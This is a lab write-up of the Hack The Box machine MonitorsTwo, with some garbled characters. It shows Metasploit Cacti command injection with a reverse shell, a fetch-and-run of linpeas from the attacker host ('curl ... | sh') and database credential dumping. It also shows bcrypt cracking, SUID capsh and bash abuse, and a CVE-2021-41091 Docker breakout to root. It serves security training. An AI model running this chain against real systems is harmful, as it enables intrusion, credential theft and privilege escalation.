Hey there, Cyber Warriors! π
Get ready for a thrilling exploration of MonitorsTwo, a remarkable CTF challenge from Hack The Box! A test of wits and cybersecurity skills, MonitorsTwo takes you on a journey full of learning and discovery. In this post, we’ll share our adventure tackling this machine, focusing on our approach and strategy. So buckle up, as we recount our exciting expedition through MonitorsTwo!
First of all we will perform a NMAP scan:
sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.211
After scanning the host we will receive the next result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
1042/tcp filtered afrog
1076/tcp filtered sns_credit
1864/tcp filtered paradym-31
9111/tcp filtered DragonIDSConsole
9929/tcp filtered nping-echo
16992/tcp filtered amt-soap-http
32776/tcp filtered sometimes-rpc15
62078/tcp filtered iphone-sync
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see the machine has different services but we will check the βnginxβ service to see which APP is running in the server:
We will see some APP named βThe Cacti Groupβ, now we need to search information about the version and also about this APP to know which is the functionality:
We found a possible vulnerability in the version that is installed but we will look for some exploit in βMetasploitβ:
search cacti
We will check this exploit βexploit/linux/http/cacti_unauthenticated_cmd_injectionβ to try to obtain a reverse shell but before doing that we will see more information about this exploit:
show options
Now we will to configure some of these parameters:
set RHOSTS 10.10.11.211
set RPORT 80
set SRVHOST 10.10.16.56
set LHOST 10.10.16.56
set LPORT 443
set target 0
Now we can exploit the vulnerability and we will receive a reverse shell:
Now we need to enumerate to discover more information to try to gain the user access:
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
We will see the first hint to know we are into a container (the name of our IP):
cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.3 50bca5e748b0
Now we will use the script βLinpeas.shβ to enumerate our machine. To do that we need to download the last release of the script:
curl -L <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh> >> linpeas.sh
After that we will turn on an HTTP server with python to provide this script into our objective:
python3 -m http.server 80
Once we have our server, we will download the βLinpeas.shβ script remotely through our reverse shell:
curl 10.10.16.56/linpeas.sh | sh
Apparently we are into a container with docker technology. We know this information because βLinpeas.shβ gathered information to say that:
βββββββββββββ
ββββββββββββββββββββββββββββββββββββ£ Container β βββββββββββββββββββββββββββββββββββ
βββββββββββββ
ββββββββββββ£ Container related tools present (if any):
ββββββββββββ£ Am I Containered?
ββββββββββββ£ Container details
ββ£ Is this a container? ........... docker
ββ£ Any running containers? ........ No
ββββββββββββ£ Docker Container details
ββ£ Am I inside Docker group ....... No
ββ£ Looking and enumerating Docker Sockets (if any):
ββ£ Docker version ................. Not Found
ββ£ Vulnerable to CVE-2019-5736 .... Not Found
ββ£ Vulnerable to CVE-2019-13139 ... Not Found
ββ£ Rootless Docker? ............... No
ββββββββββββ£ Container & breakout enumeration
β <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout>
ββ£ Container ID ................... 50bca5e748b0ββ£ Container Full ID .............. 50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
ββ£ Seccomp enabled? ............... enabled
ββ£ AppArmor profile? .............. docker-default (enforce)
ββ£ User proc namespace? ........... enabled 0 0 4294967295
ββ£ Vulnerable to CVE-2019-5021 .... No
βββ£ Breakout via mounts
β <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts>
ββ£ /proc mounted? ................. No
ββ£ /dev mounted? .................. No
ββ£ Run ushare ..................... No
ββ£ release_agent breakout 1........ No
ββ£ release_agent breakout 2........ No
ββ£ core_pattern breakout .......... No
ββ£ binfmt_misc breakout ........... No
ββ£ uevent_helper breakout ......... No
ββ£ is modprobe present ............ No
ββ£ DoS via panic_on_oom ........... No
ββ£ DoS via panic_sys_fs ........... No
ββ£ DoS via sysreq_trigger_dos ..... No
ββ£ /proc/config.gz readable ....... No
ββ£ /proc/sched_debug readable ..... Yes
ββ£ /proc/*/mountinfo readable ..... No
ββ£ /sys/kernel/security present ... Yes
ββ£ /sys/kernel/security writable .. No
Also we have the next information about the Files Mounted:
ββββββββββββ£ Interesting Files Mounted
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOKNSSNURRN2X4JEH:/var/lib/docker/overlay2/l/YWNFANZGTHCUIML4WUIJ5XNBLJ:/var/lib/docker/overlay2/l/JWCZSRNDZSQFHPN75LVFZ7HI2O:/var/lib/docker/overlay2/l/DGNCSOTM6KEIXH4KZVTVQU2KC3:/var/lib/docker/overlay2/l/QHFZCDCLZ4G4OM2FLV6Y2O6WC6:/var/lib/docker/overlay2/l/K5DOR3JDWEJL62G4CATP62ONTO:/var/lib/docker/overlay2/l/FGHBJKAFBSAPJNSTCR6PFSQ7ER:/var/lib/docker/overlay2/l/PDO4KALS2ULFY6MGW73U6QRWSS:/var/lib/docker/overlay2/l/MGUNUZVTUDFYIRPLY5MR7KQ233:/var/lib/docker/overlay2/l/VNOOF2V3SPZEXZHUKR62IQBVM5:/var/lib/docker/overlay2/l/CDCPIX5CJTQCR4VYUUTK22RT7W:/var/lib/docker/overlay2/l/G4B75MXO7LXFSK4GCWDNLV6SAQ:/var/lib/docker/overlay2/l/FRHKWDF3YAXQ3LBLHIQGVNHGLF:/var/lib/docker/overlay2/l/ZDJ6SWVJF6EMHTTO3AHC3FH3LD:/var/lib/docker/overlay2/l/W2EMLMTMXN7ODPSLB2FTQFLWA3:/var/lib/docker/overlay2/l/QRABR2TMBNL577HC7DO7H2JRN2:/var/lib/docker/overlay2/l/7IGVGYP6R7SE3WFLYC3LOBPO4Z:/var/lib/docker/overlay2/l/67QPWIAFA4NXFNM6RN43EHUJ6Q,upperdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff,workdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/work,xino=off)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (ro,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (ro,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (ro,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/perf_event type cgroup (ro,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (ro,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/memory type cgroup (ro,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/blkio type cgroup (ro,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/rdma type cgroup (ro,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/pids type cgroup (ro,nosuid,nodev,noexec,relatime,pids)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
**/dev/sda2 on /entrypoint.sh type ext4 (rw,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime)**
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/scsi type tmpfs (ro,relatime)
tmpfs on /sys/firmware type tmpfs (ro,relatime)
Also we will find the next script. We just can read the script but nothing more:
ββββββββββββ£ Possible Entrypoints
-rw-r--r-- 1 root root 648 Jan 5 11:37 /entrypoint.sh
We will investigate more the β/entrypoint.shβ script to know what it does. This script give us much information. We can enumerate the Mysql service and see the internal information:
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi
exec "$@"
Linpeas also give to us more information about the Container Capabilites:
ββββββββββββ£ Container Capabilities
β <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape>
Current: cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap=eip
Bounding set =cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: cap_chown,!cap_dac_override,!cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,!cap_linux_immutable,cap_net_bind_service,!cap_net_broadcast,!cap_net_admin,cap_net_raw,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,cap_sys_chroot,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_mknod,!cap_lease,cap_audit_write,!cap_audit_control,cap_setfcap,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=33(root) euid=0(root)
gid=33(www-data)
groups=33(www-data)
Guessed mode: UNCERTAIN (0)
Also Linpeas drop to us information about files with the SUID activate:
ββββββββββββ£ SUID - Check easy privesc, exploits and write perms
β <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid>
strace Not Found
-rwsr-xr-x 1 root root 87K Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb 7 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 52K Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 58K Feb 7 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Feb 7 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 31K Oct 14 2020 /sbin/capsh
-rwsr-xr-x 1 root root 55K Jan 20 2022 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Jan 20 2022 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 71K Jan 20 2022 /bin/su
If we check the file β/sbin/capshβ in google we can found the next information about how we can approach this issue to execute a privilege escalation (https://gtfobins.github.io/gtfobins/capsh/):
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
capsh --
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
sudo install -m =xs $(which capsh) .
./capsh --gid=0 --uid=0 --
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo capsh --
We will execute this method into our reverse shell to check if we can gain root privileges into our shell:
/sbin/capsh --gid=0 --uid=0 --
But apparently this isnβt the way to break out the container. We need to enumerate more. We will to enumerate the cacti database because we have all the information to do that:
mysql --host=db --user=root --password=root cacti -e "show tables"
After executing this command we will see different tables but we need to see the βuser_authβ table because it save something special:
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"
We have discovered a new user with hash and that is very interesting:
id username password realm full_name email_address must_change_password password_change show_tree show_list show_preview graph_settings login_opts policy_graphs policy_trees policy_hosts policy_graph_templates enabled lastchange lastlogin password_history locked failed_attempts lastfail reset_perms
1 admin $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC 0 Jamie Thompson admin@monitorstwo.htb on on on on on 2 1 1 1 1 on -1 -1 -1 0 0 663348655
3 guest 43e9a4ab75570f5b 0 Guest Account on on on on on 3 1 1 1 1 1 -1 -1 -1 0 0 0
4 marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C 0 Marcus Brune marcus@monitorstwo.htb on on on on 1 1 1 1 1 on -1 -1 on 0 0 2135691668
We can try to do brute force with john the ripper to discover the password for the user βmarcusβ:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
We have discovered the password for the user βmarcusβ:
βββ(davidγΏhsbox)-[~/hackTheBox/monitorsTwo]
ββ$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
<replaced> (?)
1g 0:00:03:06 DONE (2023-05-24 15:23) 0.005353g/s 45.66p/s 45.66c/s 45.66C/s gostosa..figueroa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We will try if this user and password works through SSH:
ssh marcus@10.10.11.211
We will have access to the user flag:
After that we will to check more information to gain root access. The first hint we will see is βYou have emailβ, this message we will see after login through SSH:
We need to go to the mail directory in linux and then we will see the marcus mailbox. After that we can show the content of the mailbox:
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team
The message said that have been discovered recently a few vulnerabilities. After checking two of them I tried the CVE-2021-41091. The explotation of this vulnerability to do privilege escalation is exactly what we need. First of all we need to back to the container where we are root and prepare SUID binary into the container:
chmod u+s /bin/bash
After that we will go to enumerate the directory which the docker container is mounted:
marcus@monitorstwo:/var/mail$ findmnt
TARGET SOURCE FSTYPE OPTIONS
/ /dev/sda2 ext4 rw,relatime
ββ/sys sysfs sysfs rw,nosuid,nodev,noexec,relatime
β ββ/sys/kernel/security securityfs securityfs rw,nosuid,nodev,noexec,relatime
β ββ/sys/fs/cgroup tmpfs tmpfs ro,nosuid,nodev,noexec,mode=755
β β ββ/sys/fs/cgroup/unified cgroup2 cgroup2 rw,nosuid,nodev,noexec,relatime,nsdelegate
β β ββ/sys/fs/cgroup/systemd cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
β β ββ/sys/fs/cgroup/perf_event cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
β β ββ/sys/fs/cgroup/memory cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory
β β ββ/sys/fs/cgroup/rdma cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
β β ββ/sys/fs/cgroup/cpu,cpuacct cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
β β ββ/sys/fs/cgroup/blkio cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
β β ββ/sys/fs/cgroup/devices cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
β β ββ/sys/fs/cgroup/freezer cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
β β ββ/sys/fs/cgroup/pids cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
β β ββ/sys/fs/cgroup/cpuset cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset
β β ββ/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
β β ββ/sys/fs/cgroup/hugetlb cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
β ββ/sys/fs/pstore pstore pstore rw,nosuid,nodev,noexec,relatime
β ββ/sys/fs/bpf none bpf rw,nosuid,nodev,noexec,relatime,mode=700
β ββ/sys/kernel/debug debugfs debugfs rw,nosuid,nodev,noexec,relatime
β ββ/sys/kernel/tracing tracefs tracefs rw,nosuid,nodev,noexec,relatime
β ββ/sys/fs/fuse/connections fusectl fusectl rw,nosuid,nodev,noexec,relatime
β ββ/sys/kernel/config configfs configfs rw,nosuid,nodev,noexec,relatime
ββ/proc proc proc rw,nosuid,nodev,noexec,relatime
β ββ/proc/sys/fs/binfmt_misc systemd-1 autofs rw,relatime,fd=28,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=15271
β ββ/proc/sys/fs/binfmt_misc binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime
ββ/dev udev devtmpfs rw,nosuid,noexec,relatime,size=1966928k,nr_inodes=491732,mode=755
β ββ/dev/pts devpts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000
β ββ/dev/shm tmpfs tmpfs rw,nosuid,nodev
β ββ/dev/hugepages hugetlbfs hugetlbfs rw,relatime,pagesize=2M
β ββ/dev/mqueue mqueue mqueue rw,nosuid,nodev,noexec,relatime
ββ/run tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=402608k,mode=755
β ββ/run/lock tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=5120k
β ββ/run/docker/netns/4475afc16c8d nsfs[net:[4026532570]]
β β nsfs rw
β ββ/run/user/1000 tmpfs tmpfs rw,nosuid,nodev,relatime,size=402608k,mode=700,uid=1000,gid=1000
β ββ/run/docker/netns/8389632fcb75 nsfs[net:[4026532631]]
β nsfs rw
ββ/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
β overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/756FTPFO4AE7HBWVGI5TXU76FU:/var/lib/docker/overlay2/l/XKE4ZK5GJUTHXKVYS4MQMJ3NOB:/var/lib/docker/overlay2/l/3JPYTR54WWK2
ββ/var/lib/docker/containers/e2378324fced58e8166b82ec842ae45961417b4195aade5113fdc9c6397edc69/mounts/shm
β shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
ββ/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
β overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOK
ββ/var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/mounts/shm
shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
After found the directory β/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/mergedβ we will perform a βDirectory Traversal & Command Execution Attackβ. We need to back to the SSH session and execute the next command:
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
And finally we will have access to the root flag:
bash-5.1# whoami
root
bash-5.1# ls /root
cacti root.txt
bash-5.1# cat root.txt
cat: root.txt: No such file or directory
bash-5.1# cat /root/root.txt
This machine in my opinion has been different. You will learn about how the vulnerabilities can give you fast access to one environment but after that not always you need to exploit some vulnerability to execute privilege escalation. However, it has been interesting because I learned about containers and also how we can breakout.
Links:
https://exploit-notes.hdks.org/exploit/container/docker/moby-docker-engine-privesc/